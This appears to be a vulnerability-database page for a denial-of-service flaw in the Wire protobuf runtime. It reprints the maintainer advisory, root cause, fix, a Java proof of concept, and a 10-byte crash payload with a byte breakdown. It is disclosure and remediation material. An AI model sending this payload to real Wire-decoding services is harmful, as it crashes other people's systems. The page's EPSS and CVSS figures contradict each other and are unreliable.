CVE-2026-45799

HIGHPre-NVD 7.57.5
EchelonGraph scoreLOW confidence

This high-severity CVE scores 7.5 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit probability: 0.1%, top 82% of all CVEs by exploit prediction. GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m, epss
7.5
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: 0%CVSS: 7.5Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Wire: skipGroup() missing negative-length check allows 10-byte payload to crash any Wire-decoding service

CVE-2026-45799

Maintainer summary

Wire's protobuf group-skipping logic did not reject negative lengths before skipping a length-delimited field inside a group. A crafted protobuf payload could cause Wire to throw an unchecked runtime exception during decoding instead of the documented IOException / ProtocolException failure path.

This can crash services that decode untrusted protobuf payloads and only handle Wire's documented checked decoding failures.

Affected artifacts

com.squareup.wire:wire-runtime

Affected versions: vulnerable releases before 6.3.0.

Patched versions: 6.3.0 and later.

Users should upgrade to com.squareup.wire:wire-runtime:6.3.0 or later.

com.squareup.wire:wire-runtime-jvm

Affected versions: vulnerable legacy releases, including 5.3.1 and 5.3.3.

Patched versions: none.

com.squareup.wire:wire-runtime-jvm is a discontinued legacy artifact and will not receive a patched release. Users should migrate to com.squareup.wire:wire-runtime:6.3.0 or later.

Wire 7 alpha releases

The fix has been merged to master and will be included in the next Wire 7 alpha release. Until that release is available, Wire 7 alpha users should avoid decoding untrusted protobuf payloads with affected alpha versions or build from a commit containing the fix.

Fix

The issue is fixed in Wire 6.3.0.

The fix rejects negative lengths while skipping groups and throws ProtocolException instead of allowing the reader to move to an invalid position and later throw an unchecked runtime exception.

Credit

Reported by @TrekLaps.

Technical details

The following technical details are based on the original report, updated by the maintainers to reflect the assigned CVE, the supported fixed artifact, and the discontinued status of com.squareup.wire:wire-runtime-jvm.

ByteArrayProtoReader32.skipGroup() in wire-runtime did not validate that a LENGTH_DELIMITED field's length is non-negative before calling skip(). A crafted protobuf varint encodes -128 as a signed Int. When skip(-128) runs, the internal position counter underflows to an invalid negative position. The next readByte() accesses the source with that negative position, throwing ArrayIndexOutOfBoundsException, a RuntimeException that escapes Wire's documented IOException boundary and can crash the request handler.

ProtoAdapter.decode(byte[]) is declared to throw IOException. Callers following the documented API may catch only IOException, so unchecked runtime exceptions from malformed input can escape the expected error boundary.

The originally confirmed vulnerable legacy versions include 5.3.1 and 5.3.3 for the discontinued com.squareup.wire:wire-runtime-jvm coordinate. The supported replacement coordinate is com.squareup.wire:wire-runtime, fixed in version 6.3.0.

Root cause

In the originally reported vulnerable code path, ByteArrayProtoReader32.skipGroup() read the length as a signed Int and used it without validating that it was non-negative:

STATE_LENGTH_DELIMITED -> {
  val length = internalReadVarint32() // returns signed Int and can be negative
  skip(length)                        // no negative check
}

The internal skip() implementation then accepted the negative count because the computed position was not greater than the limit:

private fun skip(byteCount: Int) {
  val newPos = pos + byteCount        // for example, 7 + (-128) = -121
  if (newPos > limit) throw EOFException()
  pos = newPos                        // pos = -121
}

The next read could then index the source with the invalid negative position:

private fun readByte(): Byte {
  if (pos == limit) throw EOFException()
  return source[pos++]                // source[-121] throws ArrayIndexOutOfBoundsException
}

Wire already rejected negative lengths in normal length-delimited field decoding. The same validation was missing from group-skipping code.

The fix adds this validation when skipping groups:

STATE_LENGTH_DELIMITED -> {
  val length = internalReadVarint32()
  if (length < 0) throw ProtocolException("Negative length: $length...")
  skip(length)
}

The fix was applied to both ByteArrayProtoReader32.skipGroup() and ProtoReader.skipGroup().

Reproduction

The following reproduction was provided for vulnerable legacy wire-runtime-jvm releases such as 5.3.1 and 5.3.3:

curl -sL https://repo1.maven.org/maven2/com/squareup/wire/wire-runtime-jvm/5.3.3/wire-runtime-jvm-5.3.3.jar -o wire.jar
curl -sL https://repo1.maven.org/maven2/com/squareup/okio/okio-jvm/3.9.1/okio-jvm-3.9.1.jar -o okio.jar
curl -sL https://repo1.maven.org/maven2/org/jetbrains/kotlin/kotlin-stdlib/2.1.0/kotlin-stdlib-2.1.0.jar -o stdlib.jar

// WirePoc.java
import com.squareup.wire.AnyMessage;

public class WirePoc { public static void main(String[] args) throws Exception { byte[] payload = new byte[] { (byte) 0x9B, 0x06, // field 99, START_GROUP 0x0A, // field 1, LENGTH_DELIMITED (byte) 0x80, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF, 0x0F, // varint = -128 (byte) 0x9C, 0x06 // field 99, END_GROUP };

AnyMessage.ADAPTER.decode(payload); } }

javac -cp "wire.jar:okio.jar:stdlib.jar" WirePoc.java
java -cp ".:wire.jar:okio.jar:stdlib.jar" WirePoc

Observed output on vulnerable versions:

Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: Index -120 out of bounds for length 10
    at com.squareup.wire.ByteArrayProtoReader32.readByte(ByteArrayProtoReader32.kt:448)
    at com.squareup.wire.ByteArrayProtoReader32.internalReadVarint32(ByteArrayProtoReader32.kt:294)
    at com.squareup.wire.ByteArrayProtoReader32.skipGroup(ByteArrayProtoReader32.kt:209)
    at com.squareup.wire.ByteArrayProtoReader32.nextTag(ByteArrayProtoReader32.kt:156)
    at com.squareup.wire.AnyMessage$Companion$ADAPTER$1.decode(AnyMessage.kt:150)
    at com.squareup.wire.AnyMessage$Companion$ADAPTER$1.decode(AnyMessage.kt:88)
    at com.squareup.wire.ProtoAdapter.decode(ProtoAdapter.kt:468)
    at WirePoc.main(WirePoc.java:10)

With the fix, the same payload is rejected with ProtocolException.

Why this can affect any Wire-decoding service

skipGroup() is called for any unknown field with wire type 3. An attacker can send an unknown field, such as field 99, with wire type START_GROUP. The decoder skips it via skipGroup() regardless of which message type the service uses, so no schema knowledge is required.

Payload:

9b060a80ffffff0f9c06

Payload breakdown:

0x9B 0x06                 field 99, wire type 3 (START_GROUP)
0x0A                      field 1, wire type 2 (LENGTH_DELIMITED) inside group
0x80 0xFF 0xFF 0xFF 0x0F  5-byte varint = -128 as signed Int
0x9C 0x06                 field 99, END_GROUP

CVSS v3
7.5
EG Score
7.5(low)
EPSS
17.6%
KEV
Not listed

Published

May 19, 2026

Last Modified

May 19, 2026

Vendor Advisories for CVE-2026-45799(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(2 across 1 ecosystem)
Maven(2)
PackageVulnerable rangeFixed inDependents
com.squareup.wire:wire-runtime7.0.0-alpha01, 7.0.0-alpha027.0.0-alpha03
com.squareup.wire:wire-runtime-jvm3.0.0-alpha03 ... 5.3.3 (60 versions)

Data Freshness Timeline

(refreshed 0× in last 7d / 20× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-06-29 20:41 UTCEG score recompute
  2. 2026-06-28 08:42 UTCEG score recompute
  3. 2026-06-27 20:23 UTCEG score recompute
  4. 2026-06-27 08:03 UTCEG score recompute
  5. 2026-06-26 19:43 UTCEG score recompute
  6. 2026-06-26 04:48 UTCEG score recompute
  7. 2026-06-25 16:29 UTCEG score recompute
  8. 2026-06-18 00:00 UTCEG score recompute
  9. 2026-06-17 11:40 UTCEG score recompute
  10. 2026-06-16 20:44 UTCEG score recompute
  11. 2026-06-16 04:55 UTCEG score recompute
  12. 2026-06-15 15:58 UTCEG score recompute
  13. 2026-06-15 00:02 UTCEG score recompute
  14. 2026-06-14 23:18 UTCEPSS rescore
  15. 2026-06-14 11:43 UTCEG score recompute
  16. 2026-06-13 23:22 UTCEG score recompute
  17. 2026-06-13 23:00 UTCEPSS rescore
  18. 2026-06-13 11:03 UTCEG score recompute
  19. 2026-06-12 23:12 UTCEPSS rescore
  20. 2026-06-12 22:27 UTCEG score recompute
  21. 2026-06-12 10:03 UTCEG score recompute
  22. 2026-06-11 21:45 UTCEG score recompute
  23. 2026-06-11 09:27 UTCEG score recompute
  24. 2026-06-10 21:08 UTCEG score recompute
  25. 2026-06-10 08:49 UTCEG score recompute
Show 19 more
  1. 2026-06-09 20:30 UTCEG score recompute
  2. 2026-06-09 08:10 UTCEG score recompute
  3. 2026-06-08 19:51 UTCEG score recompute
  4. 2026-06-08 07:32 UTCEG score recompute
  5. 2026-06-07 19:14 UTCEG score recompute
  6. 2026-06-07 06:55 UTCEG score recompute
  7. 2026-06-06 18:36 UTCEG score recompute
  8. 2026-06-06 06:17 UTCEG score recompute
  9. 2026-06-05 17:58 UTCEG score recompute
  10. 2026-06-05 05:39 UTCEG score recompute
  11. 2026-06-04 17:20 UTCEG score recompute
  12. 2026-06-04 05:01 UTCEG score recompute
  13. 2026-06-03 16:42 UTCEG score recompute
  14. 2026-06-03 04:23 UTCEG score recompute
  15. 2026-06-02 16:03 UTCEG score recompute
  16. 2026-06-02 03:44 UTCEG score recompute
  17. 2026-06-01 15:25 UTCEG score recompute
  18. 2026-06-01 03:06 UTCEG score recompute
  19. 2026-05-24 06:13 UTCEG score recompute

Frequently asked(5)

What is CVE-2026-45799?
CVE-2026-45799 is a high vulnerability published on May 19, 2026. Wire: skipGroup() missing negative-length check allows 10-byte payload to crash any Wire-decoding service CVE-2026-45799 Maintainer summary Wire's protobuf group-skipping logic did not reject negative lengths before skipping a length-delimited field inside a group. A crafted protobuf payload could…
When was CVE-2026-45799 disclosed?
CVE-2026-45799 was first published in the National Vulnerability Database on May 19, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-45799 actively exploited?
CVE-2026-45799 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 17.6% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-45799?
CVE-2026-45799 has a CVSS v4.0 base score of 7.5 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-45799?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-45799, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-45799

Explore →

Is Your Infrastructure Affected by CVE-2026-45799?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.